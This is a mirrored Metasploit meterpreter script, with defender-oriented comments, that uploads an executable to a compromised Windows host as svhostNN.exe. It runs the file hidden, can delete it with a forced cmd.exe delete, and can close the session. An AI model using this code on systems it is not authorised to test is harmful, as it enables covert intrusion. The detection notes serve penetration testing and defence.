Mirror of metasploit

uploadexec.rb 3.9KB

  ##
  # WARNING: Metasploit no longer maintains or accepts meterpreter scripts.
  # If you'd like to improve this script, please try to port it as a post
  # module instead. Thank you.
  ##

  # Session the script operates on; `client` is provided by the environment
  # that runs the script.
  session = client

  # Command-line switches understood by the script. Each flag maps to
  # [takes_a_value, help_text].
  # NOTE(review): "-p" is declared with `false` (no value) although its help
  # text describes a path and the option parser below assigns its value to the
  # target directory -- confirm which of the two is intended.
  @@exec_opts = Rex::Parser::Arguments.new(
    "-h" => [false, "Help menu."],
    "-e" => [true,  "Executable or script to upload to target host."],
    "-o" => [true,  "Options for executable."],
    "-p" => [false, "Path on target to upload executable, default is %TEMP%."],
    "-x" => [false, "Exit the session once the payload has been run."],
    "-s" => [true,  "Sleep for a number of seconds after uploading before executing."],
    "-v" => [false, "Verbose, return output of execution of uploaded executable."],
    "-r" => [false, "Remove the executable after running it (only works if the executable exits right away)"]
  )

  ################## Function Declarations ##################
  # Prints the script banner followed by the generated option summary, then
  # ends the script by raising Rex::Script::Completed.
  def usage
    print_line("UploadExec -- upload a script or executable and run it")
    print_line(@@exec_opts.usage)
    raise Rex::Script::Completed
  end
  # Copies a local file to the remote host and returns the remote path used.
  #
  # session - session object; sys.config.getenv and fs.file.upload_file are
  #           called on it.
  # file    - local path of the file to send.
  # trgloc  - remote directory; "" (the default) selects the remote TEMP
  #           environment variable.
  #
  # Raises RuntimeError when +file+ does not exist locally. Any error raised
  # while naming or transferring the file is reported and then re-raised.
  #
  # Artifacts this leaves on the remote host, useful for detection and triage:
  # a file named svhostNN.exe (for .exe uploads) or TMPNN<ext> (anything else)
  # in the chosen directory, where NN is rand(100), i.e. 0..99. "svhost"
  # closely resembles the legitimate svchost.exe, so a svhost*.exe located in
  # a temp directory is a strong hunting signal.
  #
  # NOTE(review): the extension is taken from the last "." anywhere in +file+;
  # rindex returns nil when there is no dot, and the last dot may belong to a
  # directory component rather than the file name.
  def upload(session, file, trgloc = "")
    raise "File to Upload does not exists!" unless ::File.exist?(file)

    remote_dir = trgloc == "" ? session.sys.config.getenv('TEMP') : trgloc

    begin
      suffix = file[file.rindex(".")..-1]
      remote_path =
        if suffix && suffix.downcase == ".exe"
          "#{remote_dir}\\svhost#{rand(100)}.exe"
        else
          "#{remote_dir}\\TMP#{rand(100)}#{suffix}"
        end

      print_status("\tUploading #{file}....")
      session.fs.file.upload_file("#{remote_path}", "#{file}")
      print_status("\t#{file} uploaded!")
      print_status("\tUploaded as #{remote_path}")
    rescue ::Exception => e
      # Report the failure, then let the caller see the same exception.
      print_status("Error uploading file #{file}: #{e.class} #{e}")
      raise e
    end

    remote_path
  end
  # Runs one command on the remote host as a hidden process.
  #
  # session - session object; sys.process.execute is called on it.
  # cmdexe  - command (here: the uploaded file's remote path) to start.
  # opt     - argument string handed to the process, or nil.
  # verbose - 1 to open a channel and print everything the process writes;
  #           any other value starts the process without a channel.
  #
  # The session's response timeout is set to 120 before the process starts.
  # Errors are reported through print_status and then re-raised.
  #
  # For defenders: the process is created with 'Hidden' => true, so no window
  # appears; process-creation logging is where this execution shows up.
  def cmd_on_trgt_exec(session, cmdexe, opt, verbose)
    session.response_timeout = 120
    capture_output = (verbose == 1)

    begin
      if capture_output
        print_status("\tRunning command #{cmdexe}")
      else
        print_status("\trunning command #{cmdexe}")
      end

      handle = session.sys.process.execute(
        cmdexe, opt, {'Hidden' => true, 'Channelized' => capture_output}
      )

      if capture_output
        # Drain the channel until read returns nil, echoing each chunk.
        while (chunk = handle.channel.read)
          print_status("\t#{chunk}")
        end
        handle.channel.close
      end

      handle.close
    rescue ::Exception => e
      print_status("Error Running Command #{cmdexe}: #{e.class} #{e}")
      raise e
    end
  end
  # Deletes +path+ on the remote host by starting `cmd.exe /c del /F /S /Q`,
  # waits in 0.10 s steps for as long as the process handle reports a name,
  # then closes the handle.
  #
  # For defenders: the resulting command line
  # (`cmd.exe /c del /F /S /Q <path>`) is visible in process-creation logs and
  # pairs with the svhostNN.exe / TMPNN<ext> file names produced by upload.
  #
  # NOTE(review): +path+ is appended unquoted, and 'Hidden' is the string
  # 'true' here while cmd_on_trgt_exec passes the boolean true.
  def m_unlink(session, path)
    delete_cmd = "cmd.exe /c del /F /S /Q " + path
    handle = session.sys.process.execute(delete_cmd, nil, {'Hidden' => 'true'})
    select(nil, nil, nil, 0.10) while handle.name
    handle.close
  end
  # Platform guard helper: prints an error saying this Meterpreter is not
  # supported by the script, then ends the run by raising
  # Rex::Script::Completed.
  def unsupported
    print_error "This version of Meterpreter is not supported with this Script!"
    raise Rex::Script::Completed
  end
  # The script only proceeds on sessions whose platform is 'windows'.
  unsupported unless client.platform == 'windows'

  # Option defaults. Flags are kept as 0/1 integers because the code below
  # compares them with == 1.
  file, path = "", ""
  cmdopt = nil
  sleep_sec = nil
  helpcall = verbose = remove = quit = 0

  # Walk the parsed switches and record each one.
  @@exec_opts.parse(args) do |opt, _idx, val|
    case opt
    when "-e" then file = val || ""
    when "-o" then cmdopt = val
    when "-p" then path = val
    when "-v" then verbose = 1
    when "-h" then helpcall = 1
    when "-s" then sleep_sec = val.to_f
    when "-r" then remove = 1
    when "-x" then quit = 1
    end
  end

  # No arguments at all, or an explicit -h, shows the help text and stops.
  usage if args.empty? || helpcall == 1
  # Main sequence: upload -> optional pause -> hidden execution -> optional
  # delete of the uploaded file -> optional session shutdown. Each step maps
  # to an observable event on the remote host (file write, process creation,
  # cmd.exe delete, session teardown), in that order.
  print_status("Running Upload and Execute Meterpreter script....")
  exec = upload(session, file, path)

  # -s: wait between the upload and the execution.
  if sleep_sec
    print_status("\tSleeping for #{sleep_sec}s...")
    Rex.sleep(sleep_sec)
  end

  cmd_on_trgt_exec(session, exec, cmdopt, verbose)

  # -r: remove the uploaded file once the command has been started.
  if remove == 1
    print_status("\tDeleting #{exec}")
    m_unlink(session, exec)
  end

  # -x: tear the session down; a failing core shutdown is ignored.
  if quit == 1
    print_status("Closing the session...")
    session.core.shutdown rescue nil
    session.shutdown_passive_dispatcher
  end

  print_status("Finished!")